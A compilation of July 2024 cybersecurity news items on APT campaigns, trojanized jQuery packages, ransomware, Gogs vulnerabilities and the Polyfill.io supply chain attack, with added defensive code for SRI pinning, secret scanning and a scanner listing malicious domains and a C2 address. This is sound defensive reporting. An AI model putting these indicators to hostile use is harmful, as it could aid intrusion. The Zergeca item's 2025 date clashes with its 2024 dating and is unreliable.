Notable among the tradecraft employed by the state-sponsored hacking crew is the
deployment of web shells to establish persistence and maintain access to the
victim's environment, as well as its use of Australian websites for
command-and-control (C2) purposes.
It has also been observed incorporating out-of-date or unpatched devices,
including small-office/home-office (SOHO) routers, as part of its attack
infrastructure in an attempt to reroute malicious traffic and evade detection,
an operational style that is akin to that used by other China-based groups like
Volt Typhoon.
According to Google-owned Mandiant, this is part of a broader transition in cyber espionage activity originating from China that aims to put stealth front and center by increasingly weaponizing network edge devices, operational relay box (ORB) networks, and living-off-the-land (LotL) techniques to fly under the radar.
Attack chains further involve carrying out reconnaissance, privilege escalation, and lateral movement activities using the remote desktop protocol (RDP) to steal credentials and exfiltrate information of interest.
To mitigate the risks posed by such threats, organizations are recommended to maintain adequate logging mechanisms, enforce multi-factor authentication (MFA), implement a robust patch management system, replace end-of-life equipment, disable unused services, ports, and protocols, and segment networks to prevent access to sensitive data.
Trojanized jQuery Packages Found on
npm, GitHub, and jsDelivr Code Repositories
9.7.24
Virus
The Hacker News
Unknown threat actors have been found propagating trojanized versions of jQuery
on npm, GitHub, and jsDelivr in what appears to be an instance of a "complex and
persistent" supply chain attack.
"This attack stands out due to the high variability across packages," Phylum said in an analysis published last week.
"The attacker has cleverly hidden the malware in the seldom-used 'end' function of jQuery, which is internally called by the more popular 'fadeTo' function from its animation utilities."
As many as 68 packages have been linked to the campaign. They were published to the npm registry starting from May 26 to June 23, 2024, using names such as cdnjquery, footersicons, jquertyi, jqueryxxx, logoo, and sytlesheets, among others.
There is evidence to suggest that each of the bogus packages was manually assembled and published, given the sheer number of packages published from various accounts, the differences in naming conventions, the inclusion of personal files, and the long time period over which they were uploaded.
This is unlike other commonly observed methods in which attackers tend to follow a predefined pattern that underscores an element of automation involved in creating and publishing the packages.
The malicious changes, per Phylum, have been introduced in a function named "end," allowing the threat actor to exfiltrate website form data to a remote URL.
Further investigation has found the trojanized jQuery file to be hosted on a GitHub repository associated with an account called "indexsc." Also present in the same repository are JavaScript files containing a script pointing to the modified version of the library.
"It's worth noting that jsDelivr constructs these GitHub URLs automatically without needing to upload anything to the CDN explicitly," Phylum said.
"This is likely an attempt by the attacker to make the source look more legitimate or to sneak through firewalls by using jsDelivr instead of loading the code directly from GitHub itself."
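Subresource Integrity (SRI) is the browser-side control that defeats a swapped-in library fetched from a CDN URL, because the page pins the exact bytes it expects rather than trusting whatever the URL currently serves. The following added Python (not Phylum's or the jQuery project's code) computes the integrity value for an audited build and re-implements the browser's comparison so a CI step can check a served file against it; the sample script body and URL are constructed.

```python
"""Subresource Integrity helpers: pin a CDN-served script to audited bytes."""
import base64
import hashlib
import hmac

HASHES = {"sha256": hashlib.sha256, "sha384": hashlib.sha384, "sha512": hashlib.sha512}

# Constructed stand-in for the audited library build you intend to serve (not jQuery).
SAMPLE_LIBRARY = b"/*! constructed sample */ window.lib = { end: function () { return this; } };\n"
SAMPLE_URL = "https://cdn.example.invalid/lib/1.0.0/lib.min.js"   # assumed URL


def sri_hash(data: bytes, alg: str = "sha384") -> str:
    """Return the SRI token '<alg>-<base64 digest>' for `data`."""
    if alg not in HASHES:
        raise ValueError(f"unsupported SRI algorithm: {alg}")
    digest = HASHES[alg](data).digest()
    return f"{alg}-{base64.b64encode(digest).decode('ascii')}"


def verify_sri(data: bytes, integrity: str) -> bool:
    """Re-implement the browser rule: of the algorithms listed in `integrity`
    only the strongest counts, and `data` must match one of its digests.
    Unlike a browser, which ignores metadata it cannot parse, this fails closed."""
    candidates = {}
    for token in integrity.split():
        alg, sep, b64 = token.partition("-")
        if sep and alg in HASHES:
            candidates.setdefault(alg, []).append(b64)
    if not candidates:
        return False
    strongest = max(candidates, key=lambda a: HASHES[a]().digest_size)
    actual = base64.b64encode(HASHES[strongest](data).digest()).decode("ascii")
    return any(hmac.compare_digest(actual, c) for c in candidates[strongest])


def script_tag(url: str, data: bytes, alg: str = "sha384") -> str:
    """Emit the <script> tag that pins `url` to the audited bytes `data`."""
    return (f'<script src="{url}" integrity="{sri_hash(data, alg)}" '
            f'crossorigin="anonymous"></script>')


if __name__ == "__main__":
    print(script_tag(SAMPLE_URL, SAMPLE_LIBRARY))
    print(verify_sri(SAMPLE_LIBRARY + b"/* appended */", sri_hash(SAMPLE_LIBRARY)))
```

The pin only helps if the integrity value is derived from a copy you reviewed, not from whatever the CDN served at build time; a modified "end" function changes the digest and the browser refuses to execute the file, which is the failure mode a defender wants here.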
The development comes as Datadog identified a series of packages on the Python Package Index (PyPI) repository with capabilities to download a second-stage binary from an attacker-controlled server depending on the CPU architecture.
New APT Group "CloudSorcerer"
Targets Russian Government Entities
8.7.24
APT
The Hacker News
A previously undocumented advanced persistent threat (APT) group dubbed
CloudSorcerer has been observed targeting Russian government entities by
leveraging cloud services for command-and-control (C2) and data exfiltration.
Cybersecurity firm Kaspersky, which discovered the activity in May 2024, said the tradecraft adopted by the threat actor bears similarities with that of CloudWizard, but pointed out differences in the malware source code. The attacks wield an innovative data-gathering program and a slew of evasion tactics for covering its tracks.
"It's a sophisticated cyber espionage tool used for stealth monitoring, data collection, and exfiltration via Microsoft Graph, Yandex Cloud, and Dropbox cloud infrastructure," the Russian security vendor said.
"The malware leverages cloud resources as its command and control (C2) servers, accessing them through APIs using authentication tokens. Additionally, CloudSorcerer uses GitHub as its initial C2 server."
The exact method used to infiltrate targets is currently unknown, but the initial access is used to drop a C-based portable executable binary that acts as a backdoor, initiates C2 communications, or injects shellcode into other legitimate processes depending on the process in which it is executed, namely mspaint.exe, msiexec.exe, or any process whose name contains the string "browser."
"The malware's ability to dynamically adapt its behavior based on the process it is running in, coupled with its use of complex inter-process communication through Windows pipes, further highlights its sophistication," Kaspersky noted.
The backdoor component is designed to collect information about the victim machine and retrieve instructions to enumerate files and folders, execute shell commands, perform file operations, and run additional payloads.
The C2 module, for its part, connects to a GitHub page that acts as a dead drop resolver to fetch an encoded hex string pointing to the actual server hosted on Microsoft Graph or Yandex Cloud.
"Alternatively, instead of connecting to GitHub, CloudSorcerer also tries to get the same data from hxxps://my.mail[.]ru/, which is a Russian cloud-based photo hosting server," Kaspersky said. "The name of the photo album contains the same hex string."
"The CloudSorcerer malware represents a sophisticated toolset targeting Russian government entities. Its use of cloud services such as Microsoft Graph, Yandex Cloud, and Dropbox for C2 infrastructure, along with GitHub for initial C2 communications, demonstrates a well-planned approach to cyber espionage."
Dark Web Malware Logs Expose 3,300
Users Linked to Child Abuse Sites
8.7.24
Virus
The Hacker News
An analysis of information-stealing malware logs published on the dark web has
led to the discovery of thousands of consumers of child sexual abuse material
(CSAM), indicating how such information could be used to combat serious crimes.
"Approximately 3,300 unique users were found with accounts on known CSAM sources," Recorded Future said in a proof-of-concept (PoC) report published last week. "A notable 4.2% had credentials for multiple sources, suggesting a higher likelihood of criminal behavior."
Over the past few years, off-the-shelf info-stealer variants have become a pervasive and ubiquitous threat targeting various operating systems with an aim to siphon sensitive information such as credentials, cryptocurrency wallets, payment card data, and screenshots.
This is evidenced in the rise of new stealer malware strains such as Kematian Stealer, Neptune Stealer, 0bj3ctivity, Poseidon (formerly RodStealer), Satanstealer, and StrelaStealer.
Distributed via phishing, spam campaigns, cracked software, fake update websites, SEO poisoning, and malvertising, such programs harvest data that typically finds its way onto the dark web in the form of stealer logs, from where it is purchased by other cybercriminals to further their schemes.
"Employees regularly save corporate credentials on personal devices or access
personal resources on organizational devices, increasing the risk of infection,"
Flare noted in a report last July.
"A complex ecosystem exists in which malware-as-a-service (MaaS) vendors sell info-stealer malware on illicit Telegram channels, threat actors distribute it through fake cracked software or phishing emails, and they then sell infected device logs on specialized dark web marketplaces."
Recorded Future's Insikt Group said it was able to identify 3,324 unique credentials used to access known CSAM domains between February 2021 and February 2024, using them to unmask three individuals who have been found to maintain accounts at no less than four websites.
The fact that stealer logs also comprise cryptocurrency wallet addresses means it could be used to determine if the addresses have been used to procure CSAM and other harmful material.
Furthermore, countries like Brazil, India, and the U.S. had the highest counts of users with credentials to known CSAM communities, although the company said that it could be due to an "overrepresentation due to dataset sourcing."
"Info-stealer malware and stolen credentials are projected to remain a cornerstone of the cybercriminal economy due to the high demand by threat actors seeking initial access to targets," it said, adding it has shared its findings with law enforcement.
"Info-stealer logs can be used by investigators and law enforcement partners to track child exploitation on the dark web and provide insight into a part of the dark web that is especially difficult to trace."
New Ransomware-as-a-Service
'Eldorado' Targets Windows and Linux Systems
8.7.24
Ransom
The Hacker News
An emerging ransomware-as-a-service (RaaS) operation called Eldorado comes with
locker variants to encrypt files on Windows and Linux systems.
Eldorado first appeared on March 16, 2024, when an advertisement for the affiliate program was posted on the ransomware forum RAMP, Singapore-headquartered Group-IB said.
The cybersecurity firm, which infiltrated the ransomware group, noted that its representative is a Russian speaker and that the malware does not overlap with previously leaked strains such as LockBit or Babuk.
"The Eldorado ransomware uses Golang for cross-platform capabilities, employing Chacha20 for file encryption and Rivest Shamir Adleman-Optimal Asymmetric Encryption Padding (RSA-OAEP) for key encryption," researchers Nikolay Kichatov and Sharmine Low said. "It can encrypt files on shared networks using Server Message Block (SMB) protocol."
The encryptor for Eldorado comes in four formats, namely esxi, esxi_64, win, and win_64, and its data leak site already listed 16 victims as of June 2024. Thirteen of the targets are located in the U.S., two in Italy, and one in Croatia.
These companies span various industry verticals such as real estate, education, professional services, healthcare, and manufacturing, among others.
Further analysis of the Windows version of artifacts has revealed the use of a PowerShell command to overwrite the locker with random bytes before deleting the file in an attempt to clean up the traces.
Eldorado is the latest in the list of new double-extortion ransomware players that have sprung up in recent times, including Arcus Media, AzzaSec, dan0n, Limpopo (aka SOCOTRA, FORMOSA, SEXi), LukaLocker, Shinra, and Space Bears, once again highlighting the enduring and persistent nature of the threat.
LukaLocker, linked to an operator dubbed Volcano Demon by Halcyon, is notable
for the fact that it does not make use of a data leak site and instead calls the
victim over the phone to extort and negotiate payment after encrypting Windows
workstations and servers.
The development coincides with the discovery of new Linux variants of Mallox (aka Fargo, TargetCompany, Mawahelper) ransomware as well as decryptors associated with seven different builds.
Mallox is known to be propagated by brute-forcing Microsoft SQL servers and
phishing emails to target Windows systems, with recent intrusions also making
use of a .NET-based loader named PureCrypter.
"The attackers are using custom python scripts for the purpose of payload delivery and victim's information exfiltration," Uptycs researchers Tejaswini Sandapolla and Shilpesh Trivedi said. "The malware encrypts user data and appends .locked extension to the encrypted files."
A decryptor has also been made available for DoNex and its predecessors (Muse, fake LockBit 3.0, and DarkRace) by Avast by taking advantage of a flaw in the cryptographic scheme. The Czech cybersecurity company said it has been "silently providing the decryptor" to victims since March 2024 in partnership with law enforcement organizations.
"Despite law enforcement efforts and increased security measures, ransomware groups continue to adapt and thrive," Group-IB said.
Data shared by Malwarebytes and NCC Group based on victims listed on the leak sites show that 470 ransomware attacks were recorded in May 2024, up from 356 in April. A majority of the attacks were claimed by LockBit, Play, Medusa, Akira, 8Base, Qilin, and RansomHub.
"The ongoing development of new ransomware strains and the emergence of sophisticated affiliate programs demonstrate that the threat is far from being contained," Group-IB noted. "Organizations must remain vigilant and proactive in their cybersecurity efforts to mitigate the risks posed by these ever-evolving threats."
Critical Unpatched Flaws Disclosed
in Popular Gogs Open-Source Git Service
8.7.24
Vulnerability
The Hacker News
Four unpatched security flaws, including three critical ones, have been
disclosed in the Gogs open-source, self-hosted Git service that could enable an
authenticated attacker to breach susceptible instances, steal or wipe source
code, and even plant backdoors.
The vulnerabilities, according to SonarSource researchers Thomas Chauchefoin and Paul Gerste, are listed below -
CVE-2024-39930 (CVSS score: 9.9) - Argument injection in the built-in SSH server
CVE-2024-39931 (CVSS score: 9.9) - Deletion of internal files
CVE-2024-39932 (CVSS score: 9.9) - Argument injection during changes preview
CVE-2024-39933 (CVSS score: 7.7) - Argument injection when tagging new releases
Successful exploitation of the first three shortcomings could permit an attacker
to execute arbitrary commands on the Gogs server, while the fourth flaw allows
attackers to read arbitrary files such as source code, and configuration
secrets.
In other words, by abusing the issues, a threat actor could read source code on the instance, modify any code, delete all code, target internal hosts reachable from the Gogs server, and impersonate other users and gain more privileges.
That said, all four vulnerabilities require that the attacker be authenticated. Furthermore, triggering CVE-2024-39930 requires that the built-in SSH server is enabled, depends on the version of the env binary in use, and requires the threat actor to be in possession of a valid SSH private key.
"If the Gogs instance has registration enabled, the attacker can simply create an account and register their SSH key," the researchers said. "Otherwise, they would have to compromise another account or steal a user's SSH private key."
Gogs instances running on Windows are not exploitable, nor is the Docker image. Instances running on Debian and Ubuntu, however, are vulnerable because the env binary shipped there supports the "--split-string" option.
According to data available on Shodan, around 7,300 Gogs instances are publicly accessible over the internet, with nearly 60% of them located in China, followed by the U.S., Germany, Russia, and Hong Kong.
It's currently not clear how many of these exposed servers are vulnerable to the aforementioned flaws. SonarSource said it does not have any visibility into whether these issues are being exploited in the wild.
The Swiss cybersecurity firm also pointed out that the project maintainers "did not implement fixes and stopped communicating" after accepting its initial report on April 28, 2023.
In the absence of an update, users are recommended to disable the built-in SSH server, turn off user registration to prevent mass exploitation, and consider switching to Gitea. SonarSource has also released a patch that users can apply, but noted it hasn't been extensively tested.
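The two interim mitigations SonarSource recommends correspond to settings in Gogs' configuration file. The fragment below is an added example, not from the advisory or the Gogs project; it assumes the instance reads its settings from custom/conf/app.ini and that the [server] START_SSH_SERVER and [service] DISABLE_REGISTRATION keys exist in the release being run, so verify both against the installed version before relying on them.

```ini
; Interim hardening for a Gogs instance awaiting an upstream fix.
; Added example, not from the advisory or the Gogs project.
; Key names follow Gogs' custom/conf/app.ini (assumption: check your release).

[server]
; CVE-2024-39930 needs the built-in SSH server; turn it off and serve Git
; over HTTPS (or the host's own sshd) instead.
START_SSH_SERVER = false

[service]
; All four issues require an authenticated user, so stop self-service
; sign-ups that would let anyone obtain an account.
DISABLE_REGISTRATION = true
```

Restart the Gogs service after the change and confirm from a client that the built-in SSH port no longer answers and that the sign-up page is gone; existing users keep working over HTTPS.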
The disclosure comes as cloud security firm Aqua discovered that sensitive information such as access tokens and passwords once hard-coded could remain permanently exposed even after removal from Git-based source code management (SCM) systems.
Dubbed phantom secrets, the issue stems from the fact that such secrets cannot be discovered by conventional scanning methods – most of which look for secrets in a repository obtained with the "git clone" command – because certain commits are accessible only via "git clone --mirror" or cached views of SCM platforms, a blind spot that such scanning tools miss.
"Commits remain accessible through 'cache views' on the SCM," security researchers Yakir Kadkoda and Ilay Goldman said. "Essentially, the SCM saves the commit content forever."
"This means that even if a secret containing commit is removed from both the cloned and mirrored versions of your repository, it can still be accessed if someone knows the commit hash. They can retrieve the commit content through the SCM platform's GUI and access the leaked secret."
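To make the blind spot concrete, the script below is an added example (not Aqua's tooling) that builds a throwaway repository, commits a constructed secret on a branch, deletes the branch, and then compares what a scanner sees through the normal commit history with what still sits in the object store. It assumes the git binary is on PATH; the secret pattern, the fake key value and the repository itself are constructed for the demonstration.

```python
"""Added example (not Aqua's tooling): why a 'git clone' view of a repository
can miss a secret that still exists in the object store.

Assumes the git binary is on PATH. The secret pattern, the fake key value and
the repository built below are all constructed for the demonstration."""
import os
import re
import subprocess
import tempfile

# One constructed key shape; a real scanner carries many more patterns.
SECRET_RE = re.compile(
    r'(?i)aws_secret_access_key\s*=\s*["\']([A-Za-z0-9/+=]{16,})["\']')

# Constructed, non-functional value used only to seed the demo repository.
FAKE_SECRET = "EXAMPLEkey0000000000000000000000"

# Fixed identity so commits succeed in an environment with no git config.
GIT_ENV = dict(
    os.environ,
    GIT_AUTHOR_NAME="demo", GIT_AUTHOR_EMAIL="demo@example.invalid",
    GIT_COMMITTER_NAME="demo", GIT_COMMITTER_EMAIL="demo@example.invalid",
)


def git(repo, *args):
    """Run a git command inside 'repo' and return its stdout as text."""
    result = subprocess.run(["git", "-C", repo, *args], env=GIT_ENV,
                            check=True, capture_output=True,
                            encoding="utf-8", errors="replace")
    return result.stdout


def find_secrets(text):
    """Return every secret value matched in 'text'."""
    return SECRET_RE.findall(text)


def scan_reachable_history(repo):
    """What a conventional scanner sees: every diff reachable from some ref,
    which is also all that a plain 'git clone' would have fetched."""
    return find_secrets(git(repo, "log", "--all", "-p"))


def scan_unreachable_objects(repo):
    """The phantom view: blobs that no branch or tag points to any more.
    --no-reflogs keeps git from treating reflog entries as reachability roots."""
    hits = []
    for line in git(repo, "fsck", "--unreachable", "--no-reflogs").splitlines():
        parts = line.split()
        if len(parts) == 3 and parts[:2] == ["unreachable", "blob"]:
            hits.extend(find_secrets(git(repo, "cat-file", "-p", parts[2])))
    return hits


def build_demo_repo(path):
    """Construct a repository in which a secret was committed on a branch
    that was later deleted, without the object store being garbage-collected."""
    git(path, "init", "-q")
    with open(os.path.join(path, "README.md"), "w") as f:
        f.write("# demo\n")
    git(path, "add", "README.md")
    git(path, "commit", "-q", "-m", "initial")
    base = git(path, "rev-parse", "--abbrev-ref", "HEAD").strip()

    git(path, "checkout", "-q", "-b", "feature")
    with open(os.path.join(path, "settings.py"), "w") as f:
        f.write(f'AWS_SECRET_ACCESS_KEY = "{FAKE_SECRET}"\n')
    git(path, "add", "settings.py")
    git(path, "commit", "-q", "-m", "add settings")

    # "Remove" the secret the way many teams do: drop the branch that held it.
    git(path, "checkout", "-q", base)
    git(path, "branch", "-D", "feature")


def demo():
    """Build the repository and return (history_hits, phantom_hits)."""
    with tempfile.TemporaryDirectory() as tmp:
        build_demo_repo(tmp)
        return scan_reachable_history(tmp), scan_unreachable_objects(tmp)


if __name__ == "__main__":
    history, phantom = demo()
    print("secrets in reachable history:", history)   # []
    print("secrets in unreachable blobs:", phantom)   # ['EXAMPLEkey0000000000000000000000']
```

The history scan returns nothing because no ref points to the deleted branch any more, which is exactly the view a scanner gets from a plain clone; the fsck pass still finds the blob because nothing has garbage-collected it. A hosted SCM that keeps commit content addressable by hash behaves the same way for anyone who knows the hash, so a removal is only complete once the secret itself has been rotated.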
Apple Removes VPN Apps from Russian App Store Amid Government Pressure
8.7.24
OS
The Hacker News
Apple removed a number of virtual private network (VPN) apps in Russia from its App Store on July 4, 2024, following a request by Russia's state communications watchdog Roskomnadzor, Russian news media reported.
This includes the mobile apps of 25 VPN service providers, including ProtonVPN, Red Shield VPN, NordVPN and Le VPN, according to MediaZona. It's worth noting that NordVPN previously shut down all its Russian servers in March 2019.
"Apple's actions, motivated by a desire to retain revenue from the Russian market, actively support an authoritarian regime," Red Shield VPN said in a statement. "This is not just reckless but a crime against civil society."
In a similar notice, Le VPN said the takedown was carried out in accordance with No. 7 of Article 15.1 of the Federal Law dated July 27, 2006, No. 149-FZ "On Information, Information Technologies and Information Protection" and that its app was removed even before it received the official notice from the watchdog.
To that end, the VPN services have been included in the "Unified register" of internet resources prohibited for public distribution in Russia.
"This event marks a significant step in Roskomnadzor's ongoing efforts to control internet access and content within Russian territory," it said.
To counter the widespread crackdown, Le VPN has since launched an alternative service called Le VPN Give that it says "allows you to connect to our secret servers using third-party open-source software and obfuscated VPN connections."
The development is part of a series of censorship moves the Kremlin has announced since the start of the Russo-Ukrainian war in February 2022, which has resulted in the blockade of several media outlets as well as social media apps such as Facebook, Instagram, and X.
Experts Warn of Mekotio Banking Trojan Targeting Latin American Countries
8.7.24
Virus
The Hacker News
Financial institutions in Latin America are being threatened by a banking trojan called Mekotio (aka Melcoz).
That's according to findings from Trend Micro, which said it recently observed a surge in cyber attacks distributing the Windows malware.
Mekotio, actively used since 2015, is known to target Latin American countries like Brazil, Chile, Mexico, Spain, Peru, and Portugal with the aim of stealing banking credentials.
First documented by ESET in August 2020, it's part of a tetrad of banking trojans targeting the region alongside Guildma, Javali, and Grandoreiro, the last of which was dismantled by law enforcement earlier this year.
"Mekotio shares common characteristics for this type of malware, such as being written in Delphi, using fake pop-up windows, containing backdoor functionality and targeting Spanish- and Portuguese-speaking countries," the Slovakian cybersecurity firm said at the time.
The malware operation suffered a blow in July 2021 when Spanish law enforcement agencies arrested 16 individuals belonging to a criminal network in connection with orchestrating social engineering campaigns targeting European users that delivered Grandoreiro and Mekotio.
Attack chains involve the use of tax-themed phishing emails that aim to trick recipients into opening malicious attachments or clicking on bogus links that lead to the deployment of an MSI installer file, which, in turn, makes use of an AutoHotKey (AHK) script to launch the malware.
It's worth noting that the infection process marks a slight deviation from the one previously detailed by Check Point in November 2021, which made use of an obfuscated batch script that runs a PowerShell script to download a second-stage ZIP file containing the AHK script.
Once installed, Mekotio harvests system information and establishes contact with a command-and-control (C2) server to receive further instructions.
Its main objective is to siphon banking credentials by displaying fake pop-ups that impersonate legitimate banking sites. It can also capture screenshots, log keystrokes, steal clipboard data, and establish persistence on the host using scheduled tasks.
The stolen information can then be used by the threat actors to gain unauthorized access to users' bank accounts and perform fraudulent transactions.
"The Mekotio banking trojan is a persistent and evolving threat to financial systems, especially in Latin American countries," Trend Micro said. "It uses phishing emails to infiltrate systems, with the goal of stealing sensitive information while also maintaining a strong foothold on compromised machines."
The development comes as Mexican cybersecurity firm Scitum disclosed details of a new Latin American banking trojan codenamed Red Mongoose Daemon that, similar to Mekotio, utilizes MSI droppers distributed via phishing emails masquerading as invoices and tax notes.
"The main objective of Red Mongoose Daemon is to steal victims' banking information by spoofing PIX transactions through overlapping windows," the company said. "This trojan is aimed at Brazilian end users and employees of organizations with banking information."
"Red Mongoose Daemon has capabilities for manipulating and creating windows, executing commands, controlling the computer remotely, manipulating web browsers, hijacking clipboards, and impersonating Bitcoin wallets by replacing copied wallets with the ones used by cybercriminals."
GootLoader Malware Still Active, Deploys New Versions for Enhanced Attacks
5.7.24
Virus
The Hacker News
The malware known as GootLoader continues to be in active use by threat actors looking to deliver additional payloads to compromised hosts.
"Updates to the GootLoader payload have resulted in several versions of GootLoader, with GootLoader 3 currently in active use," cybersecurity firm Cybereason said in an analysis published last week.
"While some of the particulars of GootLoader payloads have changed over time, infection strategies and overall functionality remain similar to the malware's resurgence in 2020."
GootLoader, a malware loader that is part of the Gootkit banking trojan, is linked to a threat actor named Hive0127 (aka UNC2565). It abuses JavaScript to download post-exploitation tools and is distributed via search engine optimization (SEO) poisoning tactics.
It typically serves as a conduit for delivering various payloads such as Cobalt Strike, Gootkit, IcedID, Kronos, REvil, and SystemBC.
In recent months, the threat actors behind GootLoader have also unleashed their own command-and-control (C2) and lateral movement tool dubbed GootBot, indicating that the "group is expanding their market to gain a wider audience for their financial gains."
Attack chains involve compromising websites to host the GootLoader JavaScript payload by passing it off as legal documents and agreements, which, when launched, sets up persistence using a scheduled task and executes additional JavaScript to kick-start a PowerShell script for collecting system information and awaiting further instructions.
"Sites that host these archive files leverage Search Engine Optimization (SEO) poisoning techniques to lure in victims that are searching for business-related files such as contract templates or legal documents," security researchers Ralph Villanueva, Kotaro Ogino, and Gal Romano said.
The attacks are also notable for making use of source code encoding, control flow obfuscation, and payload size inflation in order to resist analysis and detection. Another technique entails embedding the malware in legitimate JavaScript library files like jQuery, Lodash, Maplace.js, and tui-chart.
"GootLoader has received several updates during its life cycle, including changes to evasion and execution functionalities," the researchers concluded.
Polyfill[.]io Attack Impacts Over 380,000 Hosts, Including Major Companies
5.7.24
Hacking
The Hacker News
The supply chain attack targeting the widely used Polyfill[.]io JavaScript library is wider in scope than previously thought, with new findings from Censys showing that over 380,000 hosts are embedding a polyfill script linking to the malicious domain as of July 2, 2024.
This includes references to "https://cdn.polyfill[.]io" or "https://cdn.polyfill[.]com" in their HTTP responses, the attack surface management firm said.
"Approximately 237,700, are located within the Hetzner network (AS24940), primarily in Germany," it noted. "This is not surprising – Hetzner is a popular web hosting service, and many website developers leverage it."
Further analysis of the affected hosts has revealed domains tied to prominent companies like WarnerBros, Hulu, Mercedes-Benz, and Pearson that reference the malicious endpoint in question. Details of the attack emerged in late June 2024 when Sansec alerted that code hosted on the Polyfill domain had been modified to redirect users to adult- and gambling-themed websites. The code changes were made such that the redirections only took place at certain times of the day and only against visitors who met certain criteria.
The nefarious behavior is said to have been introduced after the domain and its associated GitHub repository were sold to a Chinese company named Funnull in February 2024.
The development has since prompted domain registrar Namecheap to suspend the domain, content delivery networks such as Cloudflare to automatically replace Polyfill links with domains leading to alternative safe mirror sites, and Google to block ads for sites embedding the domain.
While the operators attempted to relaunch the service under a different domain named polyfill[.]com, it was also taken down by Namecheap as of June 28, 2024. Of the two other domains registered by them since the start of July – polyfill[.]site and polyfillcache[.]com – the latter remains up and running.
On top of that, a more extensive network of potentially related domains, including bootcdn[.]net, bootcss[.]com, staticfile[.]net, staticfile[.]org, unionadjs[.]com, xhsbpza[.]com, union.macoms[.]la, newcrbpc[.]com, has been uncovered as tied to the maintainers of Polyfill, indicating that the incident might be part of a broader malicious campaign.
"One of these domains, bootcss[.]com, has been observed engaging in malicious activities that are very similar to the polyfill[.]io attack, with evidence dating back to June 2023," Censys noted, adding it discovered 1.6 million public-facing hosts that link to these suspicious domains.
"It wouldn't be entirely unreasonable to consider the possibility that the same malicious actor responsible for the polyfill.io attack might exploit these other domains for similar activities in the future."
The development comes as WordPress security company Patchstack warned of cascading risks posed by the Polyfill supply chain attack on sites running the content management system (CMS) through dozens of legitimate plugins that link to the rogue domain.
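The following is an added example (not Censys' or Sansec's tooling) of the check a site owner can run over their own pages: parse the HTML and flag any script, stylesheet or frame whose source resolves to one of the domains named above. It assumes the page markup has already been retrieved; the sample document is constructed, and the suspicious domain list is taken from the report with the defanging brackets removed.

```python
"""Added example (not Censys' or Sansec' tooling): flag HTML pages that load
resources from the domains named in the Polyfill[.]io reporting.

Assumes the page HTML is already in hand; the sample document is constructed."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Domains named in the report, with the defanging brackets removed.
# union.macoms[.]la is covered by matching macoms.la and its subdomains.
SUSPICIOUS_DOMAINS = {
    "polyfill.io", "polyfill.com", "polyfill.site", "polyfillcache.com",
    "bootcdn.net", "bootcss.com", "staticfile.net", "staticfile.org",
    "unionadjs.com", "xhsbpza.com", "macoms.la", "newcrbpc.com",
}


def host_matches(host):
    """True when host is one of the listed domains or a subdomain of one.
    Exact label matching avoids flagging look-alikes such as notpolyfill.io."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in SUSPICIOUS_DOMAINS)


class ResourceCollector(HTMLParser):
    """Collect (tag, attribute, url) for every externally loaded resource."""
    ATTRS = {"script": "src", "link": "href", "iframe": "src"}

    def __init__(self):
        super().__init__()
        self.resources = []

    def handle_starttag(self, tag, attrs):
        wanted = self.ATTRS.get(tag)        # HTMLParser lowercases tag names
        if wanted is None:
            return
        for name, value in attrs:
            if name == wanted and value:
                self.resources.append((tag, name, value.strip()))


def find_polyfill_references(html, page_url="https://example.invalid/"):
    """Return (tag, host, url) for resources in 'html' on a listed domain.
    Handles absolute and scheme-relative (//cdn...) references; relative
    paths and data: URIs have no host and are skipped."""
    parser = ResourceCollector()
    parser.feed(html)
    hits = []
    for tag, attr, url in parser.resources:
        candidate = url
        if url.startswith("//"):           # inherits the page's scheme
            candidate = urlparse(page_url).scheme + ":" + url
        host = urlparse(candidate).hostname
        if host and host_matches(host):
            hits.append((tag, host, url))
    return hits


# Constructed sample page; not captured from any real site.
SAMPLE_PAGE = """<!doctype html>
<html><head>
<link rel="stylesheet" href="https://cdn.bootcss.com/bootstrap/3.3.7/css/bootstrap.min.css">
<script src="https://cdn.polyfill.io/v3/polyfill.min.js?features=es6"></script>
<script src="//cdn.polyfill.com/v3/polyfill.min.js"></script>
<script src="/static/app.js"></script>
<script src="https://cdnjs.cloudflare.com/polyfill/v3/polyfill.min.js"></script>
</head><body></body></html>"""

if __name__ == "__main__":
    for tag, host, url in find_polyfill_references(SAMPLE_PAGE):
        print(f"{tag:<6} {host:<20} {url}")
```

Matching is done on the parsed hostname rather than on a substring, so a look-alike such as notpolyfill.io is not flagged, and scheme-relative references are resolved against the page scheme, which is how many older snippets embedded the script. A hit means the page still pulls code from an untrusted third party, and the reference should be removed or repointed to a vetted mirror.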
New Golang-Based Zergeca Botnet Capable of Powerful DDoS Attacks
5.7.24
BotNet
The Hacker News
Cybersecurity researchers have uncovered a new botnet called Zergeca that's capable of conducting distributed denial-of-service (DDoS) attacks.
Written in Golang, the botnet is so named for its reference to a string named "ootheca" present in the command-and-control (C2) servers ("ootheca[.]pw" and "ootheca[.]top").
"Functionally, Zergeca is not just a typical DDoS botnet; besides supporting six different attack methods, it also has capabilities for proxying, scanning, self-upgrading, persistence, file transfer, reverse shell, and collecting sensitive device information," the QiAnXin XLab team said in a report. Zergeca is also notable for using DNS-over-HTTPS (DoH) to perform Domain Name System (DNS) resolution of the C2 server and using a lesser-known library known as Smux for C2 communications.
There is evidence to suggest that the malware's operators are actively developing and updating it to support new commands. What's more, the C2 IP address 84.54.51[.]82 is said to have been previously used to distribute the Mirai botnet around September 2023.
As of April 29, 2025, the same IP address began to be used as a C2 server for the new botnet, raising the possibility that the threat actors "accumulated experience operating the Mirai botnets before creating Zergeca."
Attacks mounted by the botnet, primarily ACK flood DDoS attacks, have targeted Canada, Germany, and the U.S. between early and mid-June 2024.
Zergeca's features span four distinct modules – namely persistence, proxy, silivaccine, and zombie – which respectively set up persistence by adding a system service, implement proxying, remove competing miner and backdoor malware to gain exclusive control over devices running the x86-64 CPU architecture, and handle the main botnet functionality.
The zombie module is responsible for reporting sensitive information from the compromised device to the C2 and awaiting commands from the server, supporting six types of DDoS attacks, scanning, reverse shell, and other functions.
"The built-in competitor list shows familiarity with common Linux threats," XLab said. "Techniques like modified UPX packing, XOR encryption for sensitive strings, and using DoH to hide C2 resolution demonstrate a strong understanding of evasion tactics."
Microsoft Uncovers Critical Flaws in Rockwell Automation PanelView Plus
5.7.24
ICS
The Hacker News
Microsoft has revealed two security flaws in Rockwell Automation PanelView Plus that could be weaponized by remote, unauthenticated attackers to execute arbitrary code and trigger a denial-of-service (DoS) condition.
